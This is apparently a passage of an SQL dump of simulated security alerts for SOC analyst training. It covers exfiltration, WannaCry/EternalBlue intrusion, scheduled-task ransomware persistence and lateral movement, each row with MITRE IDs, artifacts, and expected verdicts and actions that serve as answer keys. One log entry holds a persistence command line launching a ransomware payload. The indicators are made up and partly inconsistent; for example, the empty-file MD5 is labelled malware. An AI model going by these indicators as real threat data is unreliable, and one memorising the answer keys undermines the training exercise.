'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted repository server.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user1\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_system\",\"verdict\":\"suspicious\",\"details\":\"Compromised account used for unauthorized access.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Known malware hash used in lateral movement 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.601Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"user_activity\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"compromised_username\\\":\\\"admin_user1\\\",\\\"action\\\":\\\"access_repository\\\",\\\"repository_name\\\":\\\"GalaxyBootloaders\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_accessed\\\":\\\"TrustZone_code.zip\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(919, 'Massive Data Exfiltration to External Servers', 'critical', 'Data Loss Prevention (DLP) System', 'The final phase of the operation involved transferring 190GB of sensitive source code to external servers. The threat actor Lapsus$ utilized a compromised internal server to exfiltrate the data to an external IP. Subsequently, they leveraged Telegram to initiate extortion, threatening to release the data unless their demands were met.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:53:22Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.77\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"john.doe\",\"file_hash\":\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\",\"file_name\":\"sensitive_source_code.zip\",\"transfer_size\":\"190GB\",\"malware_associated\":false,\"communication_tool\":\"Telegram\"}', '2026-01-15 01:03:01', '2026-02-16 17:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"open_threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP address known for data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_source_code.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_dlp_system\",\"verdict\":\"suspicious\",\"details\":\"File name matches pattern of sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp_system\",\"verdict\":\"suspicious\",\"details\":\"File hash associated 
with unauthorized data transfer.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised during data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\",\"reset_credentials\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.603Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:53:22Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"john.doe\\\",\\\"file_hash\\\":\\\"a6f8c4d1e2f3b4a5d6e7f8a9b0c1d2e3f4g5h6i7\\\",\\\"file_name\\\":\\\"sensitive_source_code.zip\\\",\\\"transfer_size\\\":\\\"190GB\\\",\\\"malware_associated\\\":false,\\\"communication_tool\\\":\\\"Telegram\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(920, 'Initial Access via Exploit of SMB Vulnerability', 'high', 'Network Intrusion Detection System (NIDS)', 'An attacker exploited a known SMB vulnerability in unpatched Windows XP systems within the NHS network. This vulnerability allowed unauthorized access to internal systems, risking sensitive data exposure and potential system compromise.', 'Exploitation', 'T1190 - Exploit Public-Facing Application', 1, 'investigating', 34, '{\"timestamp\":\"2023-10-11T14:23:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.10\",\"protocol\":\"SMB\",\"exploit\":\"EternalBlue\",\"action\":\"access_granted\",\"username\":\"NHS_admin\",\"file_accessed\":\"confidential_patient_data.doc\",\"hash\":\"a6d7f4c8b3e2f0d5f3d9a6b8c7e9d0a1\",\"alert_id\":\"NIDS-20231011-001\",\"malware_associated\":\"WannaCry\"}', '2026-01-15 01:03:39', '2026-03-15 02:37:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous SMB exploits\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal NHS network system\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a6d7f4c8b3e2f0d5f3d9a6b8c7e9d0a1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_patient_data.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during exploit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(921, 'Execution of WannaCry Ransomware', 'critical', 'Endpoint Detection and Response (EDR)', 'The EDR system detected the execution of WannaCry ransomware attempting to encrypt critical hospital files and systems. This activity is consistent with advanced tactics employed by the Lazarus Group, aiming to disrupt operations and demand ransom for decryption keys.', 'Malware Deployment', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_type\":\"execution\",\"source_ip\":\"185.92.220.0\",\"destination_ip\":\"192.168.15.10\",\"username\":\"hospital_admin\",\"filename\":\"wannacry.exe\",\"file_hash\":\"f4eac8d83b1f920b8b8d3b6c3c3a3f4e\",\"event_description\":\"Execution of malicious payload detected\",\"process_id\":4321,\"command_line\":\"C:\\\\Windows\\\\System32\\\\wannacry.exe\",\"alert_severity\":\"Critical\"}', '2026-01-15 01:03:39', '2026-02-16 17:54:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.15.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal hospital network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"malicious\",\"details\":\"Known ransomware executable.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f4eac8d83b1f920b8b8d3b6c3c3a3f4e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known WannaCry ransomware 
sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(922, 'Establishing Persistence through Scheduled Tasks', 'high', 'System Logs', 'The Lazarus Group has established persistence on a compromised system by creating a scheduled task that executes their ransomware payload, ensuring continued access even after initial detection and response attempts.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4698\",\"task_category\":\"Task Created\",\"computer\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\ScheduledTasks\\\\PersistenceTask\",\"task_content\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start C:\\\\Users\\\\Public\\\\Documents\\\\ransomware_payload.exe\",\"task_author\":\"Administrator\",\"source_ip\":\"192.168.1.5\",\"attacker_ip\":\"104.27.142.15\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"ransomware_payload.exe\",\"user_account\":\"admin_user\"}', '2026-01-15 01:03:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.27.142.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as ransomware payload related to Lazarus Group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used in persistence mechanism by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used for task 
creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start 
C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start 
C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.606Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_category\\\":\\\"Task Created\\\",\\\"computer\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\ScheduledTasks\\\\\\\\PersistenceTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Documents\\\\\\\\ransomware_payload.exe\\\",\\\"task_author\\\":\\\"Administrator\\\",\\\"source_ip\\\":\\\"192.168.1.5\\\",\\\"attacker_ip\\\":\\\"104.27.142.15\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"ransomware_payload.exe\\\",\\\"user_account\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(923, 'Lateral Movement Across NHS Networks', 'critical', 'Network Traffic Analysis', 'Detected lateral movement activity attempting to propagate ransomware across NHS networks. The activity was observed leveraging existing vulnerabilities to spread to additional hospital trusts.', 'Network Propagation', 'T1570', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:27Z\",\"event_id\":\"NW-849302\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.1.2.33\",\"external_ip\":\"203.0.113.45\",\"malware_filename\":\"ransomware_payload.exe\",\"hash\":\"f2b8e1182f3c4e4d7e5d1234567890ab\",\"protocol\":\"SMB\",\"user\":\"nhs_admin\",\"action\":\"propagation_attempt\",\"status\":\"failed\"}', '2026-01-15 01:03:39', '2026-02-16 17:54:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP used within the NHS network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.33\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP of another NHS system.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f2b8e1182f3c4e4d7e5d1234567890ab\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as ransomware payload linked to Lazarus Group activity.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Custom Threat Database\",\"verdict\":\"malicious\",\"details\":\"Filename associated with known ransomware 
